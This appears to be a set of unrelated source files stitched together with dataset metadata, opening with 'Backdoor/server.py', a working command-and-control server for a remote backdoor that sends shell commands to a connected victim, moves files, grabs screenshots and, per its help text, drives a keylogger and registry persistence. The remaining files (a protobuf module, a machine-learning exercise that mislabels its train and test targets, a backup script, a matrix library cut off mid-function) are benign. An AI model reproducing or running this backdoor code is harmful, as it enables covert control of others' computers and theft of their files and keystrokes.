<filename>Backdoor/server.py<gh_stars>0 import socket import termcolor import json import os def reliable_recv(): data = '' while True: try: data = data + target.recv(1024).decode().rstrip() return json.loads(data) except ValueError: continue def reliable_send(data): jsondata = json.dumps(data) target.send(jsondata.encode()) def upload_file(file_name): f = open(file_name, 'rb') target.send(f.read()) def download_file(file_name): f = open(file_name, 'wb') target.settimeout(1) chunk = target.recv(1024) while chunk: f.write(chunk) try: chunk = target.recv(1024) except socket.timeout as e: break target.settimeout(None) f.close() def target_communication(): count = 0 while True: command = input('* Shell~%s: ' % str(ip)) reliable_send(command) if command == 'quit': break elif command == 'clear': os.system('clear') elif command[:3] == 'cd ': pass elif command[:6] == 'upload': upload_file(command[7:]) elif command[:8] == 'download': download_file(command[9:]) elif command[:10] == 'screenshot': f = open('screenshot%d' % (count), 'wb') target.settimeout(3) chunk = target.recv(1024) while chunk: f.write(chunk) try: chunk = target.recv(1024) except socket.timeout as e: break target.settimeout(None) f.close() count += 1 elif command == 'help': print(termcolor.colored('''\n quit --> Quit session with the Target clear --> Clear the Screen cd *Directory Name* --> Changes directory on target system upload *File Name* --> Upload file to the target machine download *File Name* --> Download file from target machine keylog_start --> Start the KeyLogger keylog_dump --> Print KeyStrokes that the target inputted keylog_stop --> Stop and self destruct KeyLogger file presistence *RegName* *FileName* --> Create Persistence in registry (starting automatically on startup)'''),'green') else: result = reliable_recv() print(result) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #IPv4 and TCP connection sock.bind(('127.0.0.1', 5555)) print(termcolor.colored('[+] Listening for the incoming Connections', 'green')) sock.listen(5) target, ip = sock.accept() print(termcolor.colored('[+] Target connected from: ' + str(ip), 'green')) target_communication()
en
0.651109
\n quit --> Quit session with the Target clear --> Clear the Screen cd *Directory Name* --> Changes directory on target system upload *File Name* --> Upload file to the target machine download *File Name* --> Download file from target machine keylog_start --> Start the KeyLogger keylog_dump --> Print KeyStrokes that the target inputted keylog_stop --> Stop and self destruct KeyLogger file presistence *RegName* *FileName* --> Create Persistence in registry (starting automatically on startup) #IPv4 and TCP connection
2.613954
3
part2/ch11_protocol_buffer/pbuf_message_pb2.py
sorrowhill/17techs
8
6623643
<reponame>sorrowhill/17techs # -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: pbuf_message.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='pbuf_message.proto', package='', syntax='proto3', serialized_options=None, serialized_pb=_b('\n\x12pbuf_message.proto\"\x1a\n\x07Object2\x12\x0f\n\x07number2\x18\x01 \x01(\x03\"1\n\x06Object\x12\x0c\n\x04str2\x18\x01 \x01(\t\x12\x19\n\x07object2\x18\x02 \x01(\x0b\x32\x08.Object2\"\x8b\x01\n\x0fProtobufMessage\x12\x0e\n\x06number\x18\x01 \x01(\x03\x12\n\n\x02pi\x18\x02 \x01(\x01\x12\x0b\n\x03str\x18\x03 \x01(\t\x12\x10\n\x08null_key\x18\x04 \x01(\t\x12\x17\n\x06object\x18\x05 \x01(\x0b\x32\x07.Object\x12\x11\n\tnum_array\x18\x06 \x03(\x03\x12\x11\n\tstr_array\x18\x07 \x03(\tb\x06proto3') ) _OBJECT2 = _descriptor.Descriptor( name='Object2', full_name='Object2', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='number2', full_name='Object2.number2', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=22, serialized_end=48, ) _OBJECT = _descriptor.Descriptor( name='Object', full_name='Object', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='str2', full_name='Object.str2', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='object2', full_name='Object.object2', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=50, serialized_end=99, ) _PROTOBUFMESSAGE = _descriptor.Descriptor( name='ProtobufMessage', full_name='ProtobufMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='number', full_name='ProtobufMessage.number', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='pi', full_name='ProtobufMessage.pi', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='str', full_name='ProtobufMessage.str', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='null_key', full_name='ProtobufMessage.null_key', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='object', full_name='ProtobufMessage.object', index=4, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='num_array', full_name='ProtobufMessage.num_array', index=5, number=6, type=3, cpp_type=2, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='str_array', full_name='ProtobufMessage.str_array', index=6, number=7, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=102, serialized_end=241, ) _OBJECT.fields_by_name['object2'].message_type = _OBJECT2 _PROTOBUFMESSAGE.fields_by_name['object'].message_type = _OBJECT DESCRIPTOR.message_types_by_name['Object2'] = _OBJECT2 DESCRIPTOR.message_types_by_name['Object'] = _OBJECT DESCRIPTOR.message_types_by_name['ProtobufMessage'] = _PROTOBUFMESSAGE _sym_db.RegisterFileDescriptor(DESCRIPTOR) Object2 = _reflection.GeneratedProtocolMessageType('Object2', (_message.Message,), { 'DESCRIPTOR' : _OBJECT2, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:Object2) }) _sym_db.RegisterMessage(Object2) Object = _reflection.GeneratedProtocolMessageType('Object', (_message.Message,), { 'DESCRIPTOR' : _OBJECT, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:Object) }) _sym_db.RegisterMessage(Object) ProtobufMessage = _reflection.GeneratedProtocolMessageType('ProtobufMessage', (_message.Message,), { 'DESCRIPTOR' : _PROTOBUFMESSAGE, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:ProtobufMessage) }) _sym_db.RegisterMessage(ProtobufMessage) # @@protoc_insertion_point(module_scope)
# -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: pbuf_message.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='pbuf_message.proto', package='', syntax='proto3', serialized_options=None, serialized_pb=_b('\n\x12pbuf_message.proto\"\x1a\n\x07Object2\x12\x0f\n\x07number2\x18\x01 \x01(\x03\"1\n\x06Object\x12\x0c\n\x04str2\x18\x01 \x01(\t\x12\x19\n\x07object2\x18\x02 \x01(\x0b\x32\x08.Object2\"\x8b\x01\n\x0fProtobufMessage\x12\x0e\n\x06number\x18\x01 \x01(\x03\x12\n\n\x02pi\x18\x02 \x01(\x01\x12\x0b\n\x03str\x18\x03 \x01(\t\x12\x10\n\x08null_key\x18\x04 \x01(\t\x12\x17\n\x06object\x18\x05 \x01(\x0b\x32\x07.Object\x12\x11\n\tnum_array\x18\x06 \x03(\x03\x12\x11\n\tstr_array\x18\x07 \x03(\tb\x06proto3') ) _OBJECT2 = _descriptor.Descriptor( name='Object2', full_name='Object2', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='number2', full_name='Object2.number2', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=22, serialized_end=48, ) _OBJECT = _descriptor.Descriptor( name='Object', full_name='Object', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='str2', full_name='Object.str2', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='object2', full_name='Object.object2', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=50, serialized_end=99, ) _PROTOBUFMESSAGE = _descriptor.Descriptor( name='ProtobufMessage', full_name='ProtobufMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='number', full_name='ProtobufMessage.number', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='pi', full_name='ProtobufMessage.pi', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='str', full_name='ProtobufMessage.str', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='null_key', full_name='ProtobufMessage.null_key', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='object', full_name='ProtobufMessage.object', index=4, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='num_array', full_name='ProtobufMessage.num_array', index=5, number=6, type=3, cpp_type=2, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='str_array', full_name='ProtobufMessage.str_array', index=6, number=7, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=102, serialized_end=241, ) _OBJECT.fields_by_name['object2'].message_type = _OBJECT2 _PROTOBUFMESSAGE.fields_by_name['object'].message_type = _OBJECT DESCRIPTOR.message_types_by_name['Object2'] = _OBJECT2 DESCRIPTOR.message_types_by_name['Object'] = _OBJECT DESCRIPTOR.message_types_by_name['ProtobufMessage'] = _PROTOBUFMESSAGE _sym_db.RegisterFileDescriptor(DESCRIPTOR) Object2 = _reflection.GeneratedProtocolMessageType('Object2', (_message.Message,), { 'DESCRIPTOR' : _OBJECT2, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:Object2) }) _sym_db.RegisterMessage(Object2) Object = _reflection.GeneratedProtocolMessageType('Object', (_message.Message,), { 'DESCRIPTOR' : _OBJECT, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:Object) }) _sym_db.RegisterMessage(Object) ProtobufMessage = _reflection.GeneratedProtocolMessageType('ProtobufMessage', (_message.Message,), { 'DESCRIPTOR' : _PROTOBUFMESSAGE, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:ProtobufMessage) }) _sym_db.RegisterMessage(ProtobufMessage) # @@protoc_insertion_point(module_scope)
en
0.481983
# -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: pbuf_message.proto # @@protoc_insertion_point(imports) # @@protoc_insertion_point(class_scope:Object2) # @@protoc_insertion_point(class_scope:Object) # @@protoc_insertion_point(class_scope:ProtobufMessage) # @@protoc_insertion_point(module_scope)
1.324672
1
Sampling-Techniques/code.py
navinsingh1977/ga-learner-dsmp-repo
0
6623644
# -------------- import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt from sklearn.model_selection import train_test_split # Code starts here df = pd.read_csv(path) #print(df.head()) df.INCOME = df.INCOME.str.replace('$','').str.replace(',','') df.HOME_VAL = df.HOME_VAL.str.replace('$','').str.replace(',','') df.BLUEBOOK = df.BLUEBOOK.str.replace('$','').str.replace(',','') df.OLDCLAIM = df.OLDCLAIM.str.replace('$','').str.replace(',','') df.CLM_AMT = df.CLM_AMT.str.replace('$','').str.replace(',','') print(df.head()) print(df.info()) X = df.iloc[:,:-1] y = df.iloc[:,-1] count = y.value_counts() print(count) X_train, X_test, y_test, y_train = train_test_split(X,y, test_size=0.3, random_state=6) # Code ends here # -------------- # Code starts here X_train.INCOME = X_train.INCOME.astype(float) X_train.HOME_VAL = X_train.HOME_VAL.astype(float) X_train.BLUEBOOK = X_train.BLUEBOOK.astype(float) X_train.OLDCLAIM = X_train.OLDCLAIM.astype(float) X_train.CLM_AMT = X_train.CLM_AMT.astype(float) X_test.INCOME = X_test.INCOME.astype(float) X_test.HOME_VAL = X_test.HOME_VAL.astype(float) X_test.BLUEBOOK = X_test.BLUEBOOK.astype(float) X_test.OLDCLAIM = X_test.OLDCLAIM.astype(float) X_test.CLM_AMT = X_test.CLM_AMT.astype(float) print(X_train.isnull().sum()) print(X_test.isnull().sum()) # Code ends here # -------------- # Code starts here print(X_train.shape) print(X_test.shape) X_train = X_train.dropna(subset=['YOJ','OCCUPATION']) X_test = X_test.dropna(subset=['YOJ','OCCUPATION']) print(X_train.shape) print(X_test.shape) print(y_train.shape) print(y_test.shape) y_train = y_train[X_train.index] y_test = y_test[X_test.index] X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']] = X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']].fillna(X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']].mean(), inplace = True) X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']] = X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']].fillna(X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']].mean(), inplace = True) # Code ends here # -------------- from sklearn.preprocessing import LabelEncoder columns = ["PARENT1","MSTATUS","GENDER","EDUCATION","OCCUPATION","CAR_USE","CAR_TYPE","RED_CAR","REVOKED"] # Code starts here for col in columns: le = LabelEncoder() X_train[col] = le.fit_transform(X_train[col].astype(str)) X_test[col] = le.transform(X_test[col].astype(str)) # Code ends here # -------------- from sklearn.metrics import precision_score from sklearn.metrics import accuracy_score from sklearn.linear_model import LogisticRegression # code starts here print(X_train.isnull().sum()) print(y_train.isnull().sum()) model = LogisticRegression(random_state=6) model.fit(X_train,y_train) y_pred = model.predict(X_test) score = accuracy_score(y_test, y_pred) print(score) # Code ends here # -------------- from sklearn.preprocessing import StandardScaler from imblearn.over_sampling import SMOTE # code starts here smote = SMOTE(random_state=9) X_train, y_train = smote.fit_sample(X_train, y_train) scaler = StandardScaler() X_train = scaler.fit_transform(X_train) X_test = scaler.transform(X_test) # Code ends here # -------------- # Code Starts here model = LogisticRegression() model.fit(X_train, y_train) y_pred = model.predict(X_test) score = accuracy_score(y_test, y_pred) print(score) # Code ends here
# -------------- import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt from sklearn.model_selection import train_test_split # Code starts here df = pd.read_csv(path) #print(df.head()) df.INCOME = df.INCOME.str.replace('$','').str.replace(',','') df.HOME_VAL = df.HOME_VAL.str.replace('$','').str.replace(',','') df.BLUEBOOK = df.BLUEBOOK.str.replace('$','').str.replace(',','') df.OLDCLAIM = df.OLDCLAIM.str.replace('$','').str.replace(',','') df.CLM_AMT = df.CLM_AMT.str.replace('$','').str.replace(',','') print(df.head()) print(df.info()) X = df.iloc[:,:-1] y = df.iloc[:,-1] count = y.value_counts() print(count) X_train, X_test, y_test, y_train = train_test_split(X,y, test_size=0.3, random_state=6) # Code ends here # -------------- # Code starts here X_train.INCOME = X_train.INCOME.astype(float) X_train.HOME_VAL = X_train.HOME_VAL.astype(float) X_train.BLUEBOOK = X_train.BLUEBOOK.astype(float) X_train.OLDCLAIM = X_train.OLDCLAIM.astype(float) X_train.CLM_AMT = X_train.CLM_AMT.astype(float) X_test.INCOME = X_test.INCOME.astype(float) X_test.HOME_VAL = X_test.HOME_VAL.astype(float) X_test.BLUEBOOK = X_test.BLUEBOOK.astype(float) X_test.OLDCLAIM = X_test.OLDCLAIM.astype(float) X_test.CLM_AMT = X_test.CLM_AMT.astype(float) print(X_train.isnull().sum()) print(X_test.isnull().sum()) # Code ends here # -------------- # Code starts here print(X_train.shape) print(X_test.shape) X_train = X_train.dropna(subset=['YOJ','OCCUPATION']) X_test = X_test.dropna(subset=['YOJ','OCCUPATION']) print(X_train.shape) print(X_test.shape) print(y_train.shape) print(y_test.shape) y_train = y_train[X_train.index] y_test = y_test[X_test.index] X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']] = X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']].fillna(X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']].mean(), inplace = True) X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']] = X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']].fillna(X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']].mean(), inplace = True) # Code ends here # -------------- from sklearn.preprocessing import LabelEncoder columns = ["PARENT1","MSTATUS","GENDER","EDUCATION","OCCUPATION","CAR_USE","CAR_TYPE","RED_CAR","REVOKED"] # Code starts here for col in columns: le = LabelEncoder() X_train[col] = le.fit_transform(X_train[col].astype(str)) X_test[col] = le.transform(X_test[col].astype(str)) # Code ends here # -------------- from sklearn.metrics import precision_score from sklearn.metrics import accuracy_score from sklearn.linear_model import LogisticRegression # code starts here print(X_train.isnull().sum()) print(y_train.isnull().sum()) model = LogisticRegression(random_state=6) model.fit(X_train,y_train) y_pred = model.predict(X_test) score = accuracy_score(y_test, y_pred) print(score) # Code ends here # -------------- from sklearn.preprocessing import StandardScaler from imblearn.over_sampling import SMOTE # code starts here smote = SMOTE(random_state=9) X_train, y_train = smote.fit_sample(X_train, y_train) scaler = StandardScaler() X_train = scaler.fit_transform(X_train) X_test = scaler.transform(X_test) # Code ends here # -------------- # Code Starts here model = LogisticRegression() model.fit(X_train, y_train) y_pred = model.predict(X_test) score = accuracy_score(y_test, y_pred) print(score) # Code ends here
en
0.434965
# -------------- # Code starts here #print(df.head()) # Code ends here # -------------- # Code starts here # Code ends here # -------------- # Code starts here # Code ends here # -------------- # Code starts here # Code ends here # -------------- # code starts here # Code ends here # -------------- # code starts here # Code ends here # -------------- # Code Starts here # Code ends here
3.03362
3
api/resolver.py
Babylonpartners/tf-bridge
26
6623645
from .tensor_bridge import \ classify, regress, predict, multi_inference, get_model_metadata OP_DICT = { 'Classify': classify, 'Regress': regress, 'Predict': predict, 'MultiInference': multi_inference, 'GetModelMetadata': get_model_metadata } def tensor_bridge_api_resolver(operation_id): try: return OP_DICT[operation_id] except KeyError: raise AttributeError
from .tensor_bridge import \ classify, regress, predict, multi_inference, get_model_metadata OP_DICT = { 'Classify': classify, 'Regress': regress, 'Predict': predict, 'MultiInference': multi_inference, 'GetModelMetadata': get_model_metadata } def tensor_bridge_api_resolver(operation_id): try: return OP_DICT[operation_id] except KeyError: raise AttributeError
none
1
1.965883
2
scripts/SaveRun.py
jeizenga/shasta
0
6623646
<reponame>jeizenga/shasta #!/usr/bin/python3 import os import shutil import sys # Get from the arguments the list of input fasta files and check that they all exist. helpMessage = "This script copies a run to directories dataOnDisk and DataOnDisk." if not len(sys.argv)==1: print(helpMessage) exit(1) if not os.path.lexists('data'): raise Exception('data does not exist.') if not os.path.lexists('Data'): raise Exception('Data does not exist.') if os.path.lexists('dataOnDisk'): raise Exception('dataOnDisk already exists. Remove before running this script.') if os.path.lexists('DataOnDisk'): raise Exception('DataOnDisk already exists. Remove before running this script.') shutil.copytree('data', 'dataOnDisk') shutil.copytree('Data', 'DataOnDisk')
#!/usr/bin/python3 import os import shutil import sys # Get from the arguments the list of input fasta files and check that they all exist. helpMessage = "This script copies a run to directories dataOnDisk and DataOnDisk." if not len(sys.argv)==1: print(helpMessage) exit(1) if not os.path.lexists('data'): raise Exception('data does not exist.') if not os.path.lexists('Data'): raise Exception('Data does not exist.') if os.path.lexists('dataOnDisk'): raise Exception('dataOnDisk already exists. Remove before running this script.') if os.path.lexists('DataOnDisk'): raise Exception('DataOnDisk already exists. Remove before running this script.') shutil.copytree('data', 'dataOnDisk') shutil.copytree('Data', 'DataOnDisk')
en
0.622196
#!/usr/bin/python3 # Get from the arguments the list of input fasta files and check that they all exist.
2.962282
3
exercises_cv/mundo03/exCV079.py
BeatrizAlcantara/study_repository
0
6623647
# 79 Faça um programa que o usuário forneca vários valores numericos, e cadastre-os em uma lista. Caso o número já exista, ele não será adicionado. No fim, serão exibidos todos os valores únicos digitados, em ordem crescente. def Main079(): numeros = list() resposta = 's' while resposta in ['S','s']: valor = int(input('Digite o valor a ser adicionado: ')) if valor in numeros: print('Esse valor já existe, não será adicionado.') else: print('Valor adicionado com sucesso!') numeros.append(valor) resposta = input('Deseja continuar? [S/N] ').upper() if resposta in ['n','N']: break print(f'Sua lista ficou: {sorted(numeros)}') Main079()
# 79 Faça um programa que o usuário forneca vários valores numericos, e cadastre-os em uma lista. Caso o número já exista, ele não será adicionado. No fim, serão exibidos todos os valores únicos digitados, em ordem crescente. def Main079(): numeros = list() resposta = 's' while resposta in ['S','s']: valor = int(input('Digite o valor a ser adicionado: ')) if valor in numeros: print('Esse valor já existe, não será adicionado.') else: print('Valor adicionado com sucesso!') numeros.append(valor) resposta = input('Deseja continuar? [S/N] ').upper() if resposta in ['n','N']: break print(f'Sua lista ficou: {sorted(numeros)}') Main079()
pt
0.997955
# 79 Faça um programa que o usuário forneca vários valores numericos, e cadastre-os em uma lista. Caso o número já exista, ele não será adicionado. No fim, serão exibidos todos os valores únicos digitados, em ordem crescente.
4.065845
4
matrix.py
RobinNash/Matrix
0
6623648
<reponame>RobinNash/Matrix<gh_stars>0 ## matrix ## ## June, 2021 ## ## By <NAME> ## ''' This module contains Matrix, Vector, and RowOp classes. Matrix objects store entries as fractions and implement matrix operations. Matrix also does more like RREF function implements Gaussian elimination/row reduction to return a matrix in reduced row echelon form. Vector is a subclass of Matrix that implements vector operations. RowOp is a class that breaks down a row operation string to make performing row operations simpler. For example, if the user wants to add 3 * row 2 to row 1 of a 4x5 Matrix M, they can simply pass "R1 + 3*R2" into M.rowop() and the string will be given meaning by the RowOp class. ''' from fractions import Fraction as Frac from math import * # Some math functions for returning values in degrees def dcos(x): return cos(radians(x)) def dtan(x): return tan(radians(x)) def dsin(x): return sin(radians(x)) def dacos(x): return degrees(acos(x)) def dasin(x): return degrees(asin(x)) def datan(x): return degrees(atan(x)) class Matrix(list): '''2D matrix object implements matrix operations and functions Matrix can be initialized by passing a 2D array or a string of form "a b c\nd e f" where a-c are entries of first row and d-f are entries of second row ''' def __init__(self,matrix): super().__init__(matrix) # make each row a Matrix if self and type(self[0]) == list: for i in range(len(self)): self[i] = Matrix([Frac(a) for a in self[i]]) # initialize n,m if matrix is 2D if self and isinstance(self[0],list): self.m,self.n = self.mn() def __repr__(self): return str([[str(c) for c in row] for row in self]).replace("'",'') def __add__(self, matrix): '''Return self + matrix''' if not self.is_same_size(matrix): raise ValueError("Matrices not of compatable size") return Matrix([Matrix([self[i][j]+matrix[i][j] for j in range(len(self[0]))]) for i in range(len(self))]) def __radd__(self, matrix): '''Return matrix + self''' return matrix.__add__(self) def __neg__(self): '''Return self where each element is negated''' return Matrix([Matrix([-x for x in row]) for row in self]) def __sub__(self, matrix): '''Return self - matrix''' return self + -matrix def __rsub__(self,matrix): '''Return matrix - self''' return matrix - self def __mul__(self,value): '''return self*value (value can be matrix or constant)''' m,r = self.mn() if isinstance(value,(int,Frac)): return Matrix([Matrix([x*value for x in row]) for row in self]) r2,n = value.mn() if r != r2: raise ValueError("Matrices of incompatable sizes") return Matrix([Matrix([sum([self[i][t]*value[t][j] for t in range(r)]) for j in range(n)]) for i in range(m)]) def __rmul__(self, value): '''return value*self (value can be matrix or constant)''' if isinstance(value,(int,Frac)): return Matrix([Matrix([x*value for x in row]) for row in self]) return value.__mul__(self) def __floordiv__(self, value): '''Return self where each element x is x//value, value is int or Fraction''' return Matrix([Matrix([x//value for x in row]) for row in self]) def __div__(self, value): '''Return self where each element x is x/value, value is a constant''' return Matrix([Matrix([x/value for x in row]) for row in self]) def __pow__(self, value): '''Return self**value''' # if value is less than 0, we have to invert first, but we'll worry about this later if value > 0: M = self.copy() for i in range(value-1): M = M*self return M def print(self): '''display formatted matrix to console''' # holds format specifier for each column of self form = [max([len(str(self[i][j])) for i in range(self.m)]) for j in range(self.n)] M = [[f"{str(self[i][j]):>{form[j]}s}" for j in range(self.n)] for i in range(self.m)] print(str(M).replace('], [',']\n [').replace("'",''))#.replace(',','')) def copy(self): ''' Return a 2 level copy of self''' return Matrix([Matrix([x for x in row]) for row in self]) def is_same_size(self, matrix): '''return if self has the same number of rows and columns as matrix''' return self.mn() == matrix.mn() def mn(self): '''Return (row,columns) of self''' return len(self),len(self[0]) def remove_col(self,c): '''return self with column c removed''' return Matrix([[self[r][i] for i in range(self.n) if i != c] for r in range(self.m)]) def remove_row(self,r): '''return self with row r removed''' return Matrix([self[i] for i in range(self.m) if i != r]) # Row operations def swap(self,r1,r2): '''r1 <-> r2''' M = self.copy() M[r1],M[r2] = M[r2],M[r1] return M def scale(self,r1,c): '''r1 <- c*r1''' M = self.copy() M[r1] = c*M[r1] return M def pivot(self,r1,r2,c = 1): '''r1 <- r1 + c*r2''' m,n = self.mn() M = self.copy() M[r1] = M[r1]+c*M[r2] return M def row_op(self,opst): '''return matrix with row operation object or string opst applied to self''' opst = RowOp(str(opst)) if opst.op == 0: return self.swap(opst.r1,opst.r2) if opst.op == 1: return self.scale(opst.r1,opst.c) if opst.op == 2: return self.pivot(opst.r1,opst.r2,opst.c) def T(self): '''Return transpose of self''' return Matrix([[self[j][i] for j in range(len(self))] for i in range(len(self[0]))]) def REF(self, get_row_ops = False): '''Return self in a row echelon form, and the list of row operations that reduce it if get_row_ops = True.''' # Sort rows by least amount of leading zeros def leading_zeros(row,n): '''return the number of leading zeros in a list/Vector''' return n if row==[] or row[0]!=0 else leading_zeros(row[1:],n+1) def get_sort(M,start=0, ops = []): '''return M (with rows sorted by number of leading zeros) and row ops''' if start == M.m: return (M, ops) M = M.copy() leads = [leading_zeros(row,0) for row in M] r2 = leads.index(min(leads[start+1:]+[leads[start]]),start) if r2 != start: M[start],M[r2] = M[r2],M[start] ops.append(RowOp(0,start,r2)) return get_sort(M, start+1, ops) ## return Matrix(M[:start] + sorted(M[start:],key = lambda row: leading_zeros(row,0))) # if row_ops not involved M, row_ops = get_sort(self) for r in range(M.m): lead = leading_zeros(M[r],0) #where the current row's leading 1 will be # if zero row, no ops necessary if lead == M.n: break # Transform row so lead is 1 if M[r][lead] != 1: row_ops.append(RowOp(1,r,Frac(1,M[r][lead]))) M = M.scale(r,Frac(1,M[r][lead])) # Remove entries below for r2 in range(r+1,M.m): if M[r2][lead] == 0: break lead2 = leading_zeros(M[r2],0) 